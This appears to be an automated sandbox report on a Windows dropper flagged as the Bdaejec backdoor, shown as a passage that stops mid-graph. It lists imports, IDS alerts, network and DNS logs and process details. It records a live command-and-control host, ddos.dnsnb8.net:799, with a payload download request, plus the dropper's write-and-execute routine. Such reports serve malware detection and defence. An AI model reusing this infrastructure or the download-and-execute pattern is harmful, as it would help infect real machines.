                                                                                                                AVIFIL32.dllAVIStreamGetFrame, AVIStreamInfoA
                                                                                                                iphlpapi.dllGetAdaptersInfo
                                                                                                                WINMM.dllmidiStreamRestart, midiStreamClose, midiOutReset, midiStreamStop, waveOutRestart, waveOutUnprepareHeader, waveOutPrepareHeader, waveOutWrite, waveOutPause, waveOutReset, waveOutClose, midiStreamOut, midiOutPrepareHeader, midiStreamProperty, midiStreamOpen, midiOutUnprepareHeader, waveOutOpen, waveOutGetNumDevs, PlaySoundA
                                                                                                                WS2_32.dllinet_ntoa, WSAStartup, WSACleanup, select, send, closesocket, WSAAsyncSelect, recvfrom, ioctlsocket, recv, getpeername, accept, ntohl
                                                                                                                RASAPI32.dllRasGetConnectStatusA, RasHangUpA
                                                                                                                KERNEL32.dllGetVersion, FileTimeToSystemTime, TerminateThread, VirtualAlloc, VirtualFree, CreateMutexA, ReleaseMutex, SuspendThread, InterlockedIncrement, InterlockedDecrement, LocalFree, FileTimeToLocalFileTime, lstrcpynA, DuplicateHandle, FlushFileBuffers, LockFile, UnlockFile, SetEndOfFile, lstrcmpiA, GlobalDeleteAtom, GlobalFindAtomA, GlobalAddAtomA, GlobalGetAtomNameA, lstrcmpA, LocalAlloc, TlsAlloc, GlobalHandle, TlsFree, TlsSetValue, LocalReAlloc, TlsGetValue, GetFileTime, GetCurrentThread, GlobalFlags, SetErrorMode, GetProcessVersion, GetCPInfo, GetOEMCP, GetStartupInfoA, RtlUnwind, GetSystemTime, GetLocalTime, RaiseException, HeapSize, GetACP, SetStdHandle, GetFileType, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetEnvironmentVariableA, HeapDestroy, HeapCreate, SetEnvironmentVariableA, LCMapStringA, LCMapStringW, IsBadWritePtr, SetUnhandledExceptionFilter, GetStringTypeA, GetStringTypeW, CompareStringA, CompareStringW, IsBadReadPtr, IsBadCodePtr, SetLastError, GetSystemDirectoryA, GetWindowsDirectoryA, TerminateProcess, GetCurrentProcess, GetFileSize, SetFilePointer, CreateSemaphoreA, ResumeThread, ReleaseSemaphore, EnterCriticalSection, LeaveCriticalSection, GetProfileStringA, WriteFile, WaitForMultipleObjects, CreateFileA, SetEvent, FindResourceA, LoadResource, LockResource, ReadFile, lstrlenW, RemoveDirectoryA, GetModuleFileNameA, GetCurrentThreadId, ExitProcess, GlobalSize, GlobalFree, DeleteCriticalSection, InitializeCriticalSection, lstrcatA, lstrlenA, WinExec, lstrcpyA, FindNextFileA, GlobalReAlloc, HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetUserDefaultLCID, MultiByteToWideChar, WideCharToMultiByte, GetFullPathNameA, FreeLibrary, LoadLibraryA, GetLastError, GetVersionExA, WritePrivateProfileStringA, GetPrivateProfileStringA, CreateThread, CreateEventA, Sleep, GlobalAlloc, GlobalLock, GlobalUnlock, GetTempPathA, FindFirstFileA, FindClose, SetFileAttributesA, GetFileAttributesA, MoveFileA, DeleteFileA, CopyFileA, CreateDirectoryA, SetCurrentDirectoryA, GetVolumeInformationA, GetModuleHandleA, GetProcAddress, MulDiv, SetLocalTime, GetCommandLineA, GetTickCount, WaitForSingleObject, CloseHandle, InterlockedExchange, GetTimeZoneInformation
                                                                                                                USER32.dllGetSysColorBrush, GetMenuCheckMarkDimensions, GetMenuState, SetMenuItemBitmaps, CheckMenuItem, MoveWindow, IsDialogMessageA, ScrollWindowEx, SendDlgItemMessageA, MapWindowPoints, AdjustWindowRectEx, GetScrollPos, RegisterClassA, GetMenuItemCount, GetMenuItemID, SetWindowsHookExA, CallNextHookEx, GetClassLongA, SetPropA, UnhookWindowsHookEx, GetPropA, RemovePropA, GetMessageTime, GetLastActivePopup, RegisterWindowMessageA, GetWindowPlacement, EndDialog, CreateDialogIndirectParamA, DestroyWindow, GrayStringA, DrawTextA, TabbedTextOutA, EndPaint, BeginPaint, GetWindowDC, CharUpperA, GetWindowTextLengthA, SetWindowTextA, GetForegroundWindow, UnregisterHotKey, RegisterHotKey, CreateWindowExA, CallWindowProcA, GetWindowTextA, GetDlgItem, GetClassNameA, GetDesktopWindow, DrawStateA, FrameRect, GetNextDlgTabItem, LoadIconA, TranslateMessage, DrawFrameControl, DrawEdge, DrawFocusRect, WindowFromPoint, GetMessageA, DispatchMessageA, SetRectEmpty, RegisterClipboardFormatA, CreateIconFromResourceEx, DrawIconEx, CreatePopupMenu, AppendMenuA, ModifyMenuA, CreateMenu, CreateAcceleratorTableA, GetDlgCtrlID, GetSubMenu, EnableMenuItem, ClientToScreen, EnumDisplaySettingsA, LoadImageA, SystemParametersInfoA, ShowWindow, IsWindowEnabled, TranslateAcceleratorA, GetKeyState, CopyAcceleratorTableA, PostQuitMessage, IsZoomed, GetClassInfoA, DefWindowProcA, GetSystemMenu, DeleteMenu, GetMenu, SetMenu, PeekMessageA, IsIconic, SetFocus, GetActiveWindow, GetWindow, DestroyAcceleratorTable, SetWindowRgn, GetMessagePos, ScreenToClient, ChildWindowFromPointEx, CopyRect, LoadBitmapA, WinHelpA, KillTimer, SetTimer, ReleaseCapture, GetCapture, SetCapture, GetScrollRange, SetScrollRange, SetScrollPos, SetRect, InflateRect, DestroyIcon, PtInRect, OffsetRect, IsWindowVisible, EnableWindow, RedrawWindow, GetWindowLongA, SetWindowLongA, GetSysColor, SetActiveWindow, SetCursorPos, LoadCursorA, SetCursor, GetDC, FillRect, IsRectEmpty, ReleaseDC, IsChild, TrackPopupMenu, DestroyMenu, SetForegroundWindow, GetWindowRect, EqualRect, UpdateWindow, ValidateRect, InvalidateRect, GetClientRect, GetFocus, GetParent, GetTopWindow, PostMessageA, IsWindow, SetParent, DestroyCursor, SendMessageA, SetWindowPos, MessageBoxA, GetCursorPos, GetSystemMetrics, EmptyClipboard, SetClipboardData, OpenClipboard, GetClipboardData, CloseClipboard, wsprintfA, LoadStringA, CreateIconFromResource, IntersectRect, UnregisterClassA
                                                                                                                GDI32.dllCreateSolidBrush, FillRgn, CreateRectRgn, CombineRgn, PatBlt, CreatePen, SelectObject, CreatePatternBrush, CreateBitmap, CreateDCA, CreateCompatibleBitmap, GetPolyFillMode, GetStretchBltMode, GetROP2, GetBkColor, GetBkMode, GetTextColor, CreateRoundRectRgn, CreateEllipticRgn, PathToRegion, EndPath, BeginPath, GetWindowOrgEx, GetViewportOrgEx, GetWindowExtEx, TranslateCharsetInfo, SaveDC, RestoreDC, SetROP2, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetClipBox, ExcludeClipRect, MoveToEx, CreateFontIndirectA, ExtSelectClipRgn, GetViewportExtEx, PtVisible, RectVisible, ExtTextOutA, Escape, GetTextMetricsA, SetDIBitsToDevice, SetTextColor, SetBkMode, TextOutA, SetBkColor, CreateRectRgnIndirect, CreateDIBSection, SetStretchBltMode, GetClipRgn, CreatePolygonRgn, SelectClipRgn, DeleteObject, CreateDIBitmap, GetSystemPaletteEntries, CreatePalette, StretchBlt, SelectPalette, RealizePalette, GetDIBits, Ellipse, Rectangle, LPtoDP, DPtoLP, GetCurrentObject, RoundRect, CreateFontA, GetStockObject, GetObjectA, EndPage, EndDoc, DeleteDC, StartDocA, StartPage, BitBlt, GetPixel, CreateCompatibleDC, GetTextExtentPoint32A, LineTo, SetPolyFillMode, GetDeviceCaps
                                                                                                                WINSPOOL.DRVDocumentPropertiesA, ClosePrinter, OpenPrinterA
                                                                                                                comdlg32.dllChooseColorA, ChooseFontA, GetOpenFileNameA, GetSaveFileNameA, GetFileTitleA
                                                                                                                ADVAPI32.dllRegCreateKeyExA, RegQueryValueA, RegSetValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                SHELL32.dllDragAcceptFiles, DragQueryFileA, ShellExecuteA, Shell_NotifyIconA, SHGetSpecialFolderPathA, DragFinish
                                                                                                                ole32.dllCLSIDFromProgID, OleInitialize, CLSIDFromString, CoCreateInstance, OleRun, OleUninitialize
                                                                                                                OLEAUT32.dllVariantChangeType, VariantCopy, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayGetDim, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetElement, VariantCopyInd, VariantClear, SysAllocString, SafeArrayDestroy, SafeArrayCreate, SafeArrayPutElement, RegisterTypeLib, LHashValOfNameSys, LoadTypeLib, UnRegisterTypeLib, VariantInit
                                                                                                                COMCTL32.dllImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_Destroy, ImageList_Create, ImageList_BeginDrag, ImageList_DragShowNolock, _TrackMouseEvent, ImageList_SetBkColor, ImageList_GetImageCount, ImageList_EndDrag, ImageList_Read, ImageList_Duplicate, ImageList_Add
                                                                                                                WININET.dllInternetCrackUrlA, HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetConnectA, InternetSetOptionA, InternetOpenA, InternetCloseHandle, InternetCanonicalizeUrlA
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                ChineseChina
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2025-01-12T17:37:02.998602+01002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.5503701.1.1.153UDP
                                                                                                                2025-01-12T17:37:03.582373+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.54970544.221.84.105799TCP
                                                                                                                2025-01-12T17:37:04.331518+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704103.235.47.188443TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 12, 2025 17:37:03.098046064 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:03.098165035 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:03.098256111 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:03.100377083 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:03.100405931 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:03.195357084 CET49705799192.168.2.544.221.84.105
                                                                                                                Jan 12, 2025 17:37:03.200164080 CET7994970544.221.84.105192.168.2.5
                                                                                                                Jan 12, 2025 17:37:03.200516939 CET49705799192.168.2.544.221.84.105
                                                                                                                Jan 12, 2025 17:37:03.201483011 CET49705799192.168.2.544.221.84.105
                                                                                                                Jan 12, 2025 17:37:03.206257105 CET7994970544.221.84.105192.168.2.5
                                                                                                                Jan 12, 2025 17:37:03.581804991 CET7994970544.221.84.105192.168.2.5
                                                                                                                Jan 12, 2025 17:37:03.581820965 CET7994970544.221.84.105192.168.2.5
                                                                                                                Jan 12, 2025 17:37:03.582372904 CET49705799192.168.2.544.221.84.105
                                                                                                                Jan 12, 2025 17:37:03.582372904 CET49705799192.168.2.544.221.84.105
                                                                                                                Jan 12, 2025 17:37:03.583956957 CET49705799192.168.2.544.221.84.105
                                                                                                                Jan 12, 2025 17:37:03.588901997 CET7994970544.221.84.105192.168.2.5
                                                                                                                Jan 12, 2025 17:37:04.331275940 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:04.331517935 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:04.331557989 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:04.331612110 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:04.374263048 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:04.374273062 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:04.374660969 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:04.424514055 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:04.508676052 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:04.551373005 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:04.846411943 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:04.846482038 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:04.846664906 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:04.945607901 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:04.945677042 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:04.945720911 CET49704443192.168.2.5103.235.47.188
                                                                                                                Jan 12, 2025 17:37:04.945739985 CET44349704103.235.47.188192.168.2.5
                                                                                                                Jan 12, 2025 17:37:08.090950012 CET49707799192.168.2.544.221.84.105
                                                                                                                Jan 12, 2025 17:37:08.538628101 CET7994970744.221.84.105192.168.2.5
                                                                                                                Jan 12, 2025 17:37:08.538717985 CET49707799192.168.2.544.221.84.105
                                                                                                                Jan 12, 2025 17:37:08.930396080 CET7994970744.221.84.105192.168.2.5
                                                                                                                Jan 12, 2025 17:37:08.930416107 CET7994970744.221.84.105192.168.2.5
                                                                                                                Jan 12, 2025 17:37:08.930465937 CET49707799192.168.2.544.221.84.105
                                                                                                                Jan 12, 2025 17:37:29.730194092 CET49707799192.168.2.544.221.84.105
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 12, 2025 17:37:02.998601913 CET5037053192.168.2.51.1.1.1
                                                                                                                Jan 12, 2025 17:37:03.082057953 CET5684453192.168.2.51.1.1.1
                                                                                                                Jan 12, 2025 17:37:03.088790894 CET53568441.1.1.1192.168.2.5
                                                                                                                Jan 12, 2025 17:37:03.181588888 CET53503701.1.1.1192.168.2.5
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Jan 12, 2025 17:37:02.998601913 CET192.168.2.51.1.1.10x13c3Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                                                                                Jan 12, 2025 17:37:03.082057953 CET192.168.2.51.1.1.10x7527Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Jan 12, 2025 17:37:03.088790894 CET1.1.1.1192.168.2.50x7527No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jan 12, 2025 17:37:03.088790894 CET1.1.1.1192.168.2.50x7527No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jan 12, 2025 17:37:03.088790894 CET1.1.1.1192.168.2.50x7527No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                Jan 12, 2025 17:37:03.088790894 CET1.1.1.1192.168.2.50x7527No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                Jan 12, 2025 17:37:03.181588888 CET1.1.1.1192.168.2.50x13c3No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                • ddos.dnsnb8.net:799
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.54970544.221.84.1057996768C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 12, 2025 17:37:03.201483011 CET288OUTGET /cj//k1.rar HTTP/1.1
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                Host: ddos.dnsnb8.net:799
                                                                                                                Connection: Keep-Alive


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.549704103.235.47.1884431896C:\Users\user\Desktop\5vrRrFN56j.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-12 16:37:04 UTC271OUTHEAD / HTTP/1.1
                                                                                                                Cache-Control: no-cache
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                Accept-Encoding: identity
                                                                                                                Accept-Language: zh-cn
                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                                Host: www.baidu.com
                                                                                                                2025-01-12 16:37:04 UTC327INHTTP/1.1 200 OK
                                                                                                                Accept-Ranges: bytes
                                                                                                                Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
                                                                                                                Content-Length: 277
                                                                                                                Content-Type: text/html
                                                                                                                Date: Sun, 12 Jan 2025 16:37:04 GMT
                                                                                                                Etag: "575e1f6f-115"
                                                                                                                Last-Modified: Mon, 13 Jun 2016 02:50:23 GMT
                                                                                                                Pragma: no-cache
                                                                                                                Server: bfe/1.0.8.18
                                                                                                                Connection: close


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:11:37:01
                                                                                                                Start date:12/01/2025
                                                                                                                Path:C:\Users\user\Desktop\5vrRrFN56j.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\5vrRrFN56j.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:5'541'376 bytes
                                                                                                                MD5 hash:5AD1A67084EE167D59560FBAEC7529FE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.2064107799.00000000006CD000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:11:37:01
                                                                                                                Start date:12/01/2025
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                Imagebase:0x4a0000
                                                                                                                File size:15'872 bytes
                                                                                                                MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 97%, ReversingLabs
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:00:37:07
                                                                                                                Start date:13/01/2025
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1656
                                                                                                                Imagebase:0x1d0000
                                                                                                                File size:483'680 bytes
                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:53.6%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:87.5%
                                                                                                                  Total number of Nodes:8
                                                                                                                  Total number of Limit Nodes:1
                                                                                                                  execution_graph 53 9a9000 55 9a9044 GetPEB 53->55 59 9a9077 CreateFileA 55->59 57 9a922d 60 9a9246 WriteFile 57->60 61 9a9244 57->61 58 9a9265 59->57 59->58 62 9a9255 CloseHandle WinExec 60->62 61->62 62->58

                                                                                                                  Callgraph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  • Opacity -> Relevance
                                                                                                                  • Disassembly available
                                                                                                                  callgraph 0 Function_009A9000 1 Function_009A9044 0->1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 9a9044-9a9074 GetPEB 1 9a9077-9a909a 0->1 2 9a909d-9a90a0 1->2 3 9a91ee-9a922b CreateFileA 2->3 4 9a90a6-9a90bc 2->4 21 9a922d-9a9230 3->21 22 9a9265-9a9269 3->22 5 9a90be-9a90c5 4->5 6 9a9110-9a9116 4->6 5->6 7 9a90c7-9a90ce 5->7 9 9a9118-9a911f 6->9 10 9a9129-9a912f 6->10 7->6 13 9a90d0-9a90d7 7->13 9->10 14 9a9121-9a9124 9->14 11 9a9148-9a914e 10->11 12 9a9131-9a9138 10->12 17 9a9150-9a9157 11->17 18 9a9167-9a916f 11->18 12->11 16 9a913a-9a9141 12->16 13->6 19 9a90d9-9a90dd 13->19 15 9a91bb-9a91c0 14->15 24 9a91c2-9a91c5 15->24 25 9a91e0-9a91e9 15->25 16->11 23 9a9143-9a9146 16->23 17->18 26 9a9159-9a9160 17->26 27 9a9188-9a918e 18->27 28 9a9171-9a9178 18->28 19->6 29 9a90df-9a90e3 19->29 30 9a9232-9a9238 21->30 23->15 24->25 31 9a91c7-9a91ca 24->31 25->2 26->18 32 9a9162-9a9165 26->32 35 9a9190-9a9197 27->35 36 9a91a7-9a91ad 27->36 28->27 33 9a917a-9a9181 28->33 29->15 34 9a90e9-9a910b 29->34 38 9a923a-9a9242 30->38 39 9a9246-9a9252 WriteFile 30->39 31->25 40 9a91cc-9a91cf 31->40 32->15 33->27 41 9a9183-9a9186 33->41 34->1 35->36 42 9a9199-9a91a0 35->42 36->15 37 9a91af-9a91b6 36->37 37->15 43 9a91b8 37->43 38->30 44 9a9244 38->44 45 9a9255-9a9262 CloseHandle WinExec 39->45 40->25 46 9a91d1-9a91d4 40->46 41->15 42->36 48 9a91a2-9a91a5 42->48 43->15 44->45 45->22 46->25 49 9a91d6-9a91d9 46->49 48->15 49->25 50 9a91db-9a91de 49->50 50->3 50->25
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 009A9223
                                                                                                                  • WriteFile.KERNEL32(00000000,FFC0C04F,00003E00,?,00000000), ref: 009A9252
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009A9256
                                                                                                                  • WinExec.KERNEL32(?,00000005), ref: 009A9262
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2151562780.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2150632650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2150648539.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2150800723.00000000005E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151086509.0000000000915000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151108494.0000000000917000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151126092.0000000000919000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151148441.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151174930.0000000000924000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151344602.000000000092A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151363974.000000000092B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151388999.000000000093A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151408196.000000000093E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151426055.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151426055.000000000094B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151426055.0000000000988000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151426055.0000000000999000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151426055.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151540189.00000000009A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2151586093.00000000009AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_5vrRrFN56j.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateExecHandleWrite
                                                                                                                  • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WIJSmB.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                                                                                                  • API String ID: 3741012433-8072207
                                                                                                                  • Opcode ID: 18b86470980afb6ad4aed1096133aa8dd5a73126197778d1afbc8d25ddcdda57
                                                                                                                  • Instruction ID: ec65d23d521b05f15991e2b16a9be2047d4d6d504f29e13a9d01f69c714770ce
                                                                                                                  • Opcode Fuzzy Hash: 18b86470980afb6ad4aed1096133aa8dd5a73126197778d1afbc8d25ddcdda57
                                                                                                                  • Instruction Fuzzy Hash: AC613774D05216DBCF24CF94C888ABDF7B9BF4A315F2486AAD506AB601C3349E81CBD1

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:29%
                                                                                                                  Dynamic/Decrypted Code Coverage:8.9%
                                                                                                                  Signature Coverage:24%
                                                                                                                  Total number of Nodes:292
                                                                                                                  Total number of Limit Nodes:10
                                                                                                                  execution_graph 1321 4a6159 VirtualFree 1329 4a60c7 1321->1329 1322 4a6198 VirtualFree 1331 4a61b2 1322->1331 1323 4a60d5 VirtualAlloc 1323->1329 1324 4a6389 VirtualProtect 1328 4a63b7 1324->1328 1325 4a63fc VirtualProtect 1326 4a6418 1325->1326 1327 4a615f VirtualFree 1327->1329 1328->1325 1330 4a63e7 VirtualProtect 1328->1330 1329->1322 1329->1323 1329->1327 1330->1325 1330->1328 1331->1324 1332 4a62fb 1331->1332 1004 4a14e1 1005 4a14fd GetModuleHandleA 1004->1005 1006 4a1541 1004->1006 1007 4a151a VirtualQuery 1005->1007 1008 4a1512 1005->1008 1009 4a1573 1006->1009 1011 4a1549 1006->1011 1007->1008 1008->1006 1015 4a1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1009->1015 1014 4a1566 1011->1014 1032 4a1af9 1011->1032 1012 4a1579 ExitProcess 1016 4a167a 1015->1016 1017 4a167f 1015->1017 1050 4a139f GetVersionExA 1016->1050 1038 4a1718 GetSystemTimeAsFileTime 1017->1038 1020 4a16ca 1022 4a16d0 1020->1022 1023 4a16d7 1020->1023 1021 4a1686 1021->1020 1024 4a16a0 CreateThread 1021->1024 1071 4a1581 1022->1071 1026 4a170f 1023->1026 1027 4a16dd lstrcpy 1023->1027 1043 4a2c48 memset 1024->1043 1287 4a1099 1024->1287 1026->1012 1027->1012 1031 4a1718 3 API calls 1031->1020 1033 4a1b09 1032->1033 1034 4a1b11 1032->1034 1036 4a1638 188 API calls 1033->1036 1035 4a1b16 CreateThread 1034->1035 1037 4a1b0f 1034->1037 1035->1037 1306 4a1638 189 API calls 1035->1306 1036->1037 1037->1014 1039 4a1754 1038->1039 1040 4a1735 SHSetValueA 1038->1040 1041 4a175a SHGetValueA 1039->1041 1042 4a1786 __aulldiv 1039->1042 1040->1042 1041->1042 1042->1021 1077 4a1973 PathFileExistsA 1043->1077 1046 4a2cb2 1048 4a2cbb VirtualFree 1046->1048 1049 4a16ba WaitForSingleObject 1046->1049 1047 4a2c8f CreateThread WaitForMultipleObjects 1047->1046 1099 4a2b8c memset GetLogicalDriveStringsA 1047->1099 1048->1049 1049->1031 1051 4a14da 1050->1051 1052 4a13cf LookupPrivilegeValueA 1050->1052 1051->1017 1053 4a13ef 1052->1053 1054 4a13e7 1052->1054 1053->1051 1272 4a120e GetModuleHandleA GetProcAddress 1053->1272 1267 4a119f GetCurrentProcess OpenProcessToken 1054->1267 1060 4a1448 GetCurrentProcessId 1060->1051 1061 4a1457 1060->1061 1061->1051 1062 4a1319 3 API calls 1061->1062 1063 4a147f 1062->1063 1064 4a1319 3 API calls 1063->1064 1065 4a148e 1064->1065 1065->1051 1066 4a1319 3 API calls 1065->1066 1067 4a14b4 1066->1067 1068 4a1319 3 API calls 1067->1068 1069 4a14c3 1068->1069 1070 4a1319 3 API calls 1069->1070 1070->1051 1286 4a185b GetSystemTimeAsFileTime srand rand srand rand 1071->1286 1073 4a1592 